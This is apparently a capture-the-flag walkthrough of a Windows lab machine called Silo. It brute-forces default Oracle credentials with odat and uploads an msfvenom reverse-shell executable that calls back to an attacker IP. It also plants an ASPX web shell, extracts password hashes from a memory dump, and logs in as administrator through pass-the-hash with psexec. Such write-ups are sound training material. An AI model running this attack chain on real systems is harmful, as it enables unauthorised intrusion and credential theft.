Vulnerability Explanation: The machine is using default credential which could allow us to upload reverse shell and gain initial foothold on the machine.
Privilege Escalation Vulnerability: Not restricted access to sensitive file
Vulnerability Fix: Implement strong password policy and restricted permission
Severity: High
Step to Compromise the Host:
Reconnaissance
└─$ nmap -p- -sC -sV -T4 10.10.10.82
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-14 08:17 EST
Nmap scan report for 10.10.10.82
Host is up (0.046s latency).
Not shown: 65520 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49159/tcp open oracle-tns Oracle TNS listener (requires service name)
49160/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
49162/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: supported
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-11-14T13:19:52
|_ start_date: 2021-11-14T13:16:29
Port 80 http Microsoft-IIS/8.5
Port 135,49152,49153,49154,49155,49160,41961, 41962 running Microsoft Window RPC
Port 139,445 running microsoft SMB
Port 1521, 49159 running Oracle TNS listener
Port 5985, 47001 running Microsoft-HTTPAPI/2.0
Enumeration
Port 80 Microsoft-IIS/8.5
I will go through port 80 first, it just displays a default webpage of IIS. For gobuster result also didn't find any interest. Let Move On.
First thing we need to identify SID with the help of tool odat and sidguesser module.
└─$ odat sidguesser -s 10.10.10.82
[1] (10.10.10.82:1521): Searching valid SIDs
[1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
[+] 'XE' is a valid SID. Continue... ############################################################################################################################## | ETA: 00:00:00
[+] 'XEXDB' is a valid SID. Continue...
100% |#######################################################################################################################################################################| Time: 00:01:10
[1.2] Searching valid SIDs thanks to a brute-force attack on 1 chars now (10.10.10.82:1521)
100% |#######################################################################################################################################################################| Time: 00:00:02
[1.3] Searching valid SIDs thanks to a brute-force attack on 2 chars now (10.10.10.82:1521)
[+] 'XE' is a valid SID. Continue... ############################################################################################################# | ETA: 00:00:06
100% |#######################################################################################################################################################################| Time: 00:00:59
[+] SIDs found on the 10.10.10.82:1521 server: XE,XEXDB
Next step, we need to guess or brute force for username / password with SID we found. Let copy the wordlist from metasploit and add / in between username and password.
└─$ cp /usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt .
vi oracle_default_userpass.txt
:%s/ /\//g
We found valid credential scott / tiger.
└─$ /usr/share/odat/odat.py passwordguesser -s 10.10.10.82 -p1521 -d XE --accounts-file oracle_default_userpass.txt 2 ⚙
[1] (10.10.10.82:1521): Searching valid accounts on the 10.10.10.82 server, port 1521
09:40:32 WARNING -: The line 'jl/jl/\n' is not loaded in credentials list: ['jl', 'jl', '']
09:40:32 WARNING -: The line 'ose$http$admin/invalid/password\n' is not loaded in credentials list: ['ose$http$admin', 'invalid', 'password']
The login cdemo82 has already been tested at least once. What do you want to do: | ETA: 00:03:26
- stop (s/S)
- continue and ask every time (a/A)
- skip and continue to ask (p/P)
- continue without to ask (c/C)
c
[+] Valid credentials found: scott/tiger. Continue... ############################################################################ | ETA: 00:00:11
100% |#######################################################################################################################################################################| Time: 00:04:45
[+] Accounts found on 10.10.10.82:1521/XE:
scott/tiger
Let connect to the oracle with the help of tool sqlplus. As we can see we have least privilege.
└─$ sqlplus scott/tiger@10.10.10.82:1521/XE 2 ⚙
SQL*Plus: Release 19.0.0.0.0 - Production on Sun Nov 14 10:00:49 2021
Version 19.6.0.0.0
Copyright (c) 1982, 2019, Oracle. All rights reserved.
ERROR:
ORA-28002: the password will expire within 7 days
Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
SQL> select * from user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT CONNECT NO YES NO
SCOTT RESOURCE NO YES NO
Let connect again with as sysdba which mean as sudo in oracle. We can see, with sysdba, we have a lot of information.
└─$ sqlplus scott/tiger@10.10.10.82:1521/XE as sysdba 2 ⚙
SQL*Plus: Release 19.0.0.0.0 - Production on Sun Nov 14 10:01:12 2021
Version 19.6.0.0.0
Copyright (c) 1982, 2019, Oracle. All rights reserved.
Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
SQL> select * from user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYS ADM_PARALLEL_EXECUTE_TASK YES YES NO
SYS APEX_ADMINISTRATOR_ROLE YES YES NO
SYS AQ_ADMINISTRATOR_ROLE YES YES NO
SYS AQ_USER_ROLE YES YES NO
SYS AUTHENTICATEDUSER YES YES NO
SYS CONNECT YES YES NO
SYS CTXAPP YES YES NO
SYS DATAPUMP_EXP_FULL_DATABASE YES YES NO
SYS DATAPUMP_IMP_FULL_DATABASE YES YES NO
SYS DBA YES YES NO
SYS DBFS_ROLE YES YES NO
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYS DELETE_CATALOG_ROLE YES YES NO
SYS EXECUTE_CATALOG_ROLE YES YES NO
SYS EXP_FULL_DATABASE YES YES NO
SYS GATHER_SYSTEM_STATISTICS YES YES NO
SYS HS_ADMIN_EXECUTE_ROLE YES YES NO
SYS HS_ADMIN_ROLE YES YES NO
SYS HS_ADMIN_SELECT_ROLE YES YES NO
SYS IMP_FULL_DATABASE YES YES NO
SYS LOGSTDBY_ADMINISTRATOR YES YES NO
SYS OEM_ADVISOR YES YES NO
SYS OEM_MONITOR YES YES NO
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYS PLUSTRACE YES YES NO
SYS RECOVERY_CATALOG_OWNER YES YES NO
SYS RESOURCE YES YES NO
SYS SCHEDULER_ADMIN YES YES NO
SYS SELECT_CATALOG_ROLE YES YES NO
SYS XDBADMIN YES YES NO
SYS XDB_SET_INVOKER YES YES NO
SYS XDB_WEBSERVICES YES YES NO
SYS XDB_WEBSERVICES_OVER_HTTP YES YES NO
SYS XDB_WEBSERVICES_WITH_PUBLIC YES YES NO
32 rows selected.
#1 Exploitation (No Priv-Esc)
Let generate our reverse shell payload with exe extension.
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.31 LPORT=4444 -f exe > shell.exe 2 ⚙
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of aspx file: 2717 bytes
Let start our netcat listener on port 4444.
nc -lvp 4444
Try to upload our payload to the machine. We have least privilege. Let try with sysdba.
└─$ odat utlfile -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --putFile C:\\inetpub\\wwwroot shell.exe shell.exe 2 ⚙
[1] (10.10.10.82:1521): Put the shell.exe local file in the C:\inetpub\wwwroot folder like shell.exe on the 10.10.10.82 server
[-] Impossible to put the shell.exe file: `ORA-01031: insufficient privileges`
└─$ /usr/share/odat/odat.py utlfile -s 10.10.10.82 -p 1521 -U scott -P tiger --sysdba -d XE --putFile C:\\inetpub\\wwwroot shell.exe shell.exe 1 ⨯ 2 ⚙
[1] (10.10.10.82:1521): Put the shell.exe local file in the C:\inetpub\wwwroot folder like shell.exe on the 10.10.10.82 server
[+] The shell.exe file was created on the C:\inetpub\wwwroot directory on the 10.10.10.82 server like the shell.exe file
Once, we have upload, we cannot execute it via web browser. We can use module externaltable.
└─$ /usr/share/odat/odat.py externaltable -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --exec C:\\inetpub\\wwwroot shell.exe --sysdba 2 ⨯ 2 ⚙
[1] (10.10.10.82:1521): Execute the shell.exe command stored in the C:\inetpub\wwwroot path
We are now the authority system.
#2 Exploitation (Priv-Esc)
Shell as service user
Let upload the file command execution to the machine.
└─$ cp /usr/share/webshells/aspx/cmdasp.aspx .
└─$ /usr/share/odat/odat.py utlfile -s 10.10.10.82 -p 1521 -U scott -P tiger --sysdba -d XE --putFile C:\\inetpub\\wwwroot cmdasp.aspx cmdasp.aspx 102 ⨯ 1 ⚙
[1] (10.10.10.82:1521): Put the cmdasp.aspx local file in the C:\inetpub\wwwroot folder like cmdasp.aspx on the 10.10.10.82 server
[+] The cmdasp.aspx file was created on the C:\inetpub\wwwroot directory on the 10.10.10.82 server like the cmdasp.aspx file
As we have checked the system is x64 architecture, let start SMB Server to share file netcat.
impacket-smbserver share .
Start our netcat listener on port 4444.
nc -lvp 4444
Try to execute netcat reverse shell to our machine.
Going through user Phineas, we found file Oracle issue.txt which contain the link to dropbox and password.
On our terminal screen could not read the password properly.
Let download it to our machine and open it with notepad or gedit. Now we can see it properly.
Follow through the link and it's valid. Enter the password we found a zip file to download.
Let download it to our machine and unzip it. We see there is a file with dmp extension.
└─$ unzip SILO-20180105-221806.zip
Archive: SILO-20180105-221806.zip
inflating: SILO-20180105-221806.dmp
└─$ file SILO-20180105-221806.dmp
SILO-20180105-221806.dmp: MS Windows 64bit crash dump, full dump, 261996 pages
DMP file contains data dumped from a program's memory space. They are often created when a program has an error or crashes.
First enumerating on OS. We found it's running on Window server 2012 and x64.
c:\windows\system32\inetsrv>systeminfo
systeminfo
Host Name: SILO
OS Name: Microsoft Windows Server 2012 R2 Standard
OS Version: 6.3.9600 N/A Build 9600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00252-00115-23036-AA976
Original Install Date: 12/31/2017, 11:01:23 PM
System Boot Time: 11/14/2021, 3:49:15 PM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Let run the tool volatility --info flag to see the profiles.
└─$ ./volatility --info 1 ⨯
Volatility Foundation Volatility Framework 2.6
Profiles
--------
Win2012R2x64 - A Profile for Windows Server 2012 R2 x64
Win2012R2x64_18340 - A Profile for Windows Server 2012 R2 x64 (6.3.9600.18340 / 2016-05-13)
Win2012x64 - A Profile for Windows Server 2012 x64
As we can see the profiles name Win2012R2x64. Let run with plugin kdbgscan.
Now we got the hash of all the users on the machine.
└─$ impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 administrator@10.10.10.82 130 ⨯
Impacket v0.9.24.dev1+20210706.140217.6da655ca - Copyright 2021 SecureAuth Corporation
[*] Requesting shares on 10.10.10.82.....
[*] Found writable share ADMIN$
[*] Uploading file qTeibVEJ.exe
[*] Opening SVCManager on 10.10.10.82.....
[*] Creating service rmGc on 10.10.10.82.....
[*] Starting service rmGc.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>echo %username%
SILO$
There is a about the exploit.
There is a tool called Volatility, we can download from . Volatility is an open-source memory forensics framework for incident response and malware analysis.
